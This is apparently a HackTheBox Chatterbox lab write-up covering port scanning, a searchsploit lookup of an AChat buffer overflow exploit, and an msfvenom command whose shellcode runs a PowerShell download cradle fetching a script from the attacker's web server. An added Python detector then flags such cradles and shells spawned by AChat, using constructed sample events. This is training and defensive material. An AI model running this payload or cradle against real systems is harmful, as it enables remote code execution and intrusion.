Today I am solving the HackTheBox Chatterbox machine. This is a retired machine, but it is great for studying Windows privilege escalation.

HackTheBox Chatterbox

I am doing this machine to better understand Windows exploitation and to prepare for the eCPPTv2 certification by eLearnSecurity.


To start, I scan the machine with rustscan, checking all 65535 ports.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ rustscan -a chatterbox.htb -- -p-

The machine has two open ports; let's check which services are running on them using nmap.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ nmap -T4 -A -Pn -p 9255,9256 chatterbox.htb

The nmap scan shows that the AChat system is running on both ports: port 9255 serves an HTTPD service and port 9256 runs the chat system itself.

Let's search for an exploit with searchsploit, and enumerate folders and files on port 9255, since it has an HTTP server running.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit achat


Great, searchsploit found a Remote Buffer Overflow exploit for the Achat system.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit -m windows/remote/36025.py
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines (637)

Copied to: /home/rfs/HackTheBox/HTB_Chatterbox/36025.py

Exploitation

How to Generate Metasploit Payloads

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.52/writeup.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > new.txt
┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ python3 -m http.server 80
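From the defender's side, the payload generated above leaves two clear traces in process-creation telemetry: a PowerShell download cradle (IEX plus a WebClient download) on the command line, and a shell interpreter spawned as a child of the AChat service process, which a chat server has no reason to do. The following Python script is an added example of that detection logic and is not part of the original writeup; the three events are constructed samples, and the AChat install path under C:\Program Files\AChat is an assumption.

```python
import re

# Constructed sample process-creation events, in the shape a Sysmon Event ID 1
# or Security 4688 record would have after parsing. These are made-up samples,
# not telemetry captured from the Chatterbox machine; the AChat install path
# is an assumption.
SAMPLE_EVENTS = [
    {"pid": 1204,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\AChat\AChat.exe",
     "cmdline": "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.52/writeup.ps1')\""},
    {"pid": 1310,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"pid": 1422,
     "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Program Files\AChat\AChat.exe",
     "cmdline": "cmd /c whoami"},
]

# Download-cradle pattern: Invoke-Expression (or its IEX alias) combined with a
# WebClient download call. The \s* after New-Object also catches the variant
# with the space missing, which PowerShell rejects but which still shows intent.
CRADLE_RE = re.compile(
    r"\b(IEX|Invoke-Expression)\b[\s(]*.*?"
    r"(New-Object\s*Net\.WebClient|DownloadString|DownloadFile)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"""https?://[^\s'")]+""", re.IGNORECASE)

# Interpreters that a chat service has no business spawning.
SHELLS = {"powershell.exe", "cmd.exe"}
ACHAT_IMAGE = "achat.exe"


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of detection names that fire on one event."""
    findings = []
    if CRADLE_RE.search(event["cmdline"]):
        findings.append("powershell_download_cradle")
    if basename(event["image"]) in SHELLS and basename(event["parent"]) == ACHAT_IMAGE:
        findings.append("shell_spawned_by_achat")
    return findings


def extract_urls(cmdline):
    """Pull remote URLs out of a command line so they can be blocked or hunted for."""
    return URL_RE.findall(cmdline)


def scan(events):
    """Map PID -> findings for every event that triggers at least one rule."""
    results = {}
    for event in events:
        findings = classify(event)
        if findings:
            results[event["pid"]] = findings
    return results


if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        event = next(e for e in SAMPLE_EVENTS if e["pid"] == pid)
        print(pid, findings, extract_urls(event["cmdline"]))
```

The parent-child rule is the more robust of the two: encoders and obfuscation change the command line, but a windows/exec payload still runs its command as a child of the exploited AChat process, so the process tree gives the alert even when the cradle text is disguised.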


Achat 0.150 beta7 – Remote Buffer Overflow